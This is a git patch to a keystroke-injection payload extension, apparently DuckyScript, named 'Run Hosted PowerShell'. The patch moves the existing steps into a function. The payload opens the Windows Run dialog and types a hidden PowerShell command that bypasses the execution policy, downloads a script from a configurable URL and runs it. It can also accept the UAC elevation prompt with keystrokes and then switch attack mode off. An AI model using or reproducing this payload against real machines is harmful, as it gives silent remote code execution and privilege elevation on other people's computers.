From 52f6bdbc6f53605fee64784686b370afdc9a20f3 Mon Sep 17 00:00:00 2001
From: PlumpyTurkey <157210867+PlumpyTurkey@users.noreply.github.com>
Date: Fri, 12 Jul 2024 16:41:39 +0200
Subject: [PATCH] Uses a function instead of executing directly

---
 .../community/RUN_HOSTED_POWERSHELL           | 30 ++++++++++---------
 1 file changed, 16 insertions(+), 14 deletions(-)

diff --git a/payloads/extensions/community/RUN_HOSTED_POWERSHELL b/payloads/extensions/community/RUN_HOSTED_POWERSHELL
index 5c15895..33b422f 100644
--- a/payloads/extensions/community/RUN_HOSTED_POWERSHELL
+++ b/payloads/extensions/community/RUN_HOSTED_POWERSHELL
@@ -2,9 +2,9 @@ EXTENSION RUN_HOSTED_POWERSHELL
     REM_BLOCK DOCUMENTATION
         Title: Run Hosted PowerShell
         Author: PlumpyTurkey
-        Description: This extension executes a hosted PowerShell script using the Windows Run dialog box.
+        Description: This extension allows you to run a hosted PowerShell script using the Windows Run dialog box.
         Target: Windows 10, 11
-        Version: 1.0
+        Version: 1.1
     END_REM
 
     REM Required options:
@@ -15,20 +15,22 @@ EXTENSION RUN_HOSTED_POWERSHELL
     DEFINE #RHP_ELEVATED_EXECUTION FALSE
     DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
 
-    GUI r
+    FUNCTION RHP_RUN()
+        GUI r
 
-    DELAY #RHP_DELAY
-    STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
-
-    IF_DEFINED_TRUE #RHP_ELEVATED_EXECUTION
-        CTRL SHIFT ENTER
         DELAY #RHP_DELAY
-        LEFT
-    END_IF_DEFINED
+        STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
 
-    ENTER
+        IF_DEFINED_TRUE #RHP_ELEVATED_EXECUTION
+            CTRL SHIFT ENTER
+            DELAY #RHP_DELAY
+            LEFT
+        END_IF_DEFINED
 
-    IF_DEFINED_TRUE #RHP_DISABLE_AFTER_EXECUTION
-        ATTACKMODE OFF
-    END_IF_DEFINED
+        ENTER
+
+        IF_DEFINED_TRUE #RHP_DISABLE_AFTER_EXECUTION
+            ATTACKMODE OFF
+        END_IF_DEFINED
+    END_FUNCTION
 END_EXTENSION